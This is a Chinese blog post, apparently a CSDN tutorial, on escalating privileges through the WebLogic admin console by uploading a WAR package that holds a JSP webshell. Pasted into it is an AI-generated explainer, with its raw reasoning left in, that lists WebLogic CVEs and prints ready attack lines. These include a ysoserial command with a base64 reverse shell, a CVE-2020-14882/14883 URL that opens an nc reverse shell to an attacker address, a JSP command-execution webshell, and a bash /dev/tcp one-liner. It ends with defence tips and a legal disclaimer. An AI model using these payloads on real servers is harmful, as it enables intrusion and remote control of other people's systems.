weblogic系列漏洞整理 ———— 3. weblogic 后台提权

本文详细介绍了通过WebLogic中间件进行提权的操作流程。从获取后台密码开始,演示了如何上传包含恶意代码的WAR包,最终实现服务器权限提升。文章涵盖了WAR包的制作与上传步骤,以及验证提权成功的具体方法。

提权思路

weblogic是一个基于JavaEE的中间件,它可以解析jsp代码,当我们知道后台密码之后,即可登陆weblogic后台,上传恶意war包,从而进行提权操作。

漏洞利用过程

登陆weblogic后台 http://192.168.11.178:7001/console,进取之后点击左侧的部署,在弹出来的右侧页面点击“安装”

在安装页面选择“上载文件”:

在 “将部署上载到管理服务器” 区域选择"浏览",然后按照提示(其实就是一直下一步就行,最后点保存),将打包好的包含大马的war包上传至服务器。

WAR包的准备:

包含大马的war包制作方法:

jar -cvf test.war ./test/*

将test目录打包为test.war

上传:

上传成功后即可访问该jsp马查看效果

登录之后可以进行各项操作,下面简单的执行一个命令吧!

下面回到原来的系统中进行验证

至此完成!

<think>嗯,用户这次聚焦在Weblogic中间件的三个具体问题上:漏洞类型、限获取方法和shell概念。从ta引用的大量漏洞资料看,用户可能正在研究中间件安全,或是渗透测试学习者。 注意到用户特别强调“不是真正的需求”,说明ta更希望我炼核心知识点而非罗列引用内容。之前的引用中其实已经覆盖了关键漏洞(反序列化、未授访问、弱口令),但需要重新组织成体系化的分类。 关于“获取限的方法”,用户引用的四个资料恰好对应三种典型路径: 1. 利用反序列化漏洞直接执行代码(引用2和4) 2. 通过后台弱口令部署恶意war包(引用33. 组合利用未授漏洞加载恶意XML(引用4) ——这些应该作为方法论重点展开。 用户询问“shell的含义”这点很有意思。在漏洞文献中突然插入基础概念查询,推测可能是刚接触网络安全的新手。需要区别于普通命令行解释器,突出其在渗透测试中作为“控制通道”的特殊价值,最好用反向shell的例子说明攻击者如何维持访问。 突然想到补充XMLDecoder反序列化漏洞是必要的,因为用户供的引用4中到XML利用却没解释原理。另外T3协议漏洞虽然引用2过,但需要关联到更常见的CVE编号如CVE-2015-4852方便用户后续搜索。 防御措施部分用户没明确要求,但基于漏洞方法论的完整性应该简要及。特别是生产模式关闭测试页这点,用户在引用1里特别标注过“有一定限制”,说明ta注意到环境差异的影响。 最后shell的比喻可能需要更贴切,“系统的后门钥匙”这个说法是否准确?或许用“远程遥控器”更形象——毕竟攻击者是通过它发送指令的。 </think>以下是关于WebLogic中间件漏洞限获取方法及Shell含义的详细说明: --- ### **一、WebLogic中间件常见漏洞** #### 1. **反序列化漏洞** - **原理**:攻击者通过T3/IIOP协议发送恶意序列化数据,触发Java反序列化漏洞执行任意代码[^2]。 - **影响版本**: - CVE-2018-2628:影响10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3等 - CVE-2020-2551:影响10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4 - **风险**:远程获取服务器控制。 #### 2. **未授漏洞组合(CVE-2020-14882/14883)** - **原理**: - CVE-2020-14882:绕过控制台身份验证。 - CVE-2020-14883:通过构造恶意URL执行命令(如`.../console.portal?handle=com.tangosol.coherence.mvel2.sh.ShellSession("命令")`)[^4]。 - **风险**:未授执行系统命令,直接获取Shell。 #### 3. **任意文件上传漏洞** - **触发条件**:需开启Web Service Test Page(生产模式默认关闭)[^1]。 - **利用方式**:上传恶意文件(如JSP木马)到服务器。 #### 4. **后台弱口令漏洞** - **风险**:通过默认账户(如`weblogic/Oracle@123`)登录管理控制台,直接部署恶意WAR包获取限[^3]。 #### 5. **XMLDecoder反序列化漏洞** - **案例**:CVE-2017-10271,通过构造恶意XML数据执行系统命令。 --- ### **二、获取WebLogic限的常用方法** #### 1. **利用反序列化漏洞** - **步骤**: 1. 构造恶意序列化Payload(如Ysoserial工具生成)。 2. 通过T3协议发送至WebLogic服务端口(默认7001)。 3. 执行反弹Shell命令连接攻击机。 - **关键命令**: ```bash java -jar ysoserial.jar CommonsCollections1 &#39;bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMi84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}&#39; > payload.bin ``` (Payload编码后执行`bash -i >& /dev/tcp/192.168.1.2/8888 0>&1`) #### 2. **组合未授漏洞利用** - **步骤**: 1. 利用CVE-2020-14882绕过登录验证。 2. 通过CVE-2020-14883执行命令加载恶意XML或直接执行系统命令[^4]: ``` http://target:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_handle=com.tangosol.coherence.mvel2.sh.ShellSession("rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.1.10+4444>/tmp/f") ``` #### 3. **弱口令+后台部署WAR木马** - **步骤**: 1. 爆破或使用默认口令登录`http://target:7001/console`。 2. 部署包含JSP Webshell的WAR包。 3. 访问Webshell路径执行命令。 #### 4. **文件上传漏洞利用** - **条件**:Web Service Test Page开启(`/ws_utc/begin.do`)。 - **方法**:上传JSP脚本获取Webshell。 --- ### **三、Shell的含义与作用** #### 1. **Shell的定义** - **本质**:命令行解释器,是用户与操作系统内核交互的接口(如Linux的Bash、Windows的CMD)。 - **在渗透中的作用**: - **Webshell**:通过Web服务器(如JSP/ASP/PHP脚本)执行系统命令的恶意脚本。 ```jsp <%@ page import="java.util.*,java.io.*"%> <% String cmd = request.getParameter("cmd"); Process p = Runtime.getRuntime().exec(cmd); // ...(输出执行结果) %> ``` - **反弹Shell(Reverse Shell)**: 目标主机主动连接攻击机,供命令行控制(绕过防火墙限制)。 **典型命令**:`bash -i >& /dev/tcp/攻击IP/端口 0>&1` #### 2. **Shell的限级别** | 类型 | 限说明 | 获取方式 | |---------------|-----------------------------------|------------------------------| | **Webshell** | Web服务器进程限(如`tomcat`用户) | 文件上传/代码注入 | | **系统Shell** | 高限账户(如`root`) | 漏洞(如脏牛、SUID滥用) | --- ### **四、防御建议** 1. **及时更新补丁**:关注Oracle官方安全公告,修复高危漏洞。 2. **关闭非必要服务**:生产环境禁用Web Service Test Page和T3协议外网访问。 3. **强化口令策略**:避免使用默认密码,启用多因素认证。 4. **最小限原则**:WebLogic服务账户降,限制文件系统写入限。 > **注**:本文所述漏洞利用方法仅限于安全研究,未经授测试属违法行为。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值